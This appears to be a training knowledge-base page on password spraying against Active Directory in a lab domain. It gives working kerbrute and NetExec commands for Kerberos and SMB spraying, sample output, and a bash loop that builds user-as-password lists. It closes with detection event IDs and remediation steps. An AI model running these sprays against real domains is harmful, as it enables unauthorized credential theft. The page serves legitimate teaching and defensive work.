Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 01. Initial Access / Techniques

Password Spraying

Password spraying tests one password against many users.

We spray after username enumeration and password policy review. The goal is one valid credential, not speed.


Inputs

Required:

DC IP
domain name
confirmed usernames
password policy or lab permission
one candidate password

OOTW:

export DC=10.10.10.200
export DOMAIN=ootw.local

Kerberos Spray

kerbrute passwordspray -d $DOMAIN --dc $DC confirmed-users.txt 'StudentPass2026!'

Success:

VALID LOGIN: alice.wright@ootw.local:StudentPass2026!

Kerberos spraying is useful because it targets the domain directly and does not require SMB to be open beyond the DC path.


SMB Spray

nxc smb $DC -d $DOMAIN -u confirmed-users.txt -p 'StudentPass2026!' --continue-on-success

Success:

[+] ootw.local\alice.wright:StudentPass2026!

Save valid credentials separately:

nxc smb $DC -d $DOMAIN -u confirmed-users.txt -p 'StudentPass2026!' --continue-on-success | tee spray-results.txt
grep '[+]' spray-results.txt > valid-creds.txt

User-As-Password

Generate a small user-as-password list:

while read u; do
  low=$(echo "$u" | tr '[:upper:]' '[:lower:]')
  cap="$(echo ${low:0:1} | tr '[:lower:]' '[:upper:]')${low:1}"
  for p in "$low" "$cap" "${low}1" "${low}123" "${cap}1" "${cap}123" "${cap}!"; do
    echo "$p"
  done
done < confirmed-users.txt | sort -u > passlist.txt

Test each user with the same password value only where the lab allows it:

nxc smb $DC -d $DOMAIN -u confirmed-users.txt -p confirmed-users.txt --no-bruteforce --continue-on-success

--no-bruteforce pairs line 1 username with line 1 password instead of trying every password against every user.


Detection

Defenders look for:

  • Security 4625 across many users
  • Security 4771 with failure code 0x18
  • Security 4776 with bad password status
  • later Security 4624 success from the same source
  • Kerbrute, NetExec, CrackMapExec, or spray scripts

Remediation

  • enforce MFA
  • tune account lockout policy
  • monitor one-source-many-user authentication patterns
  • block legacy protocols where possible
  • use strong unique passwords
  • alert on successful logons after spray bursts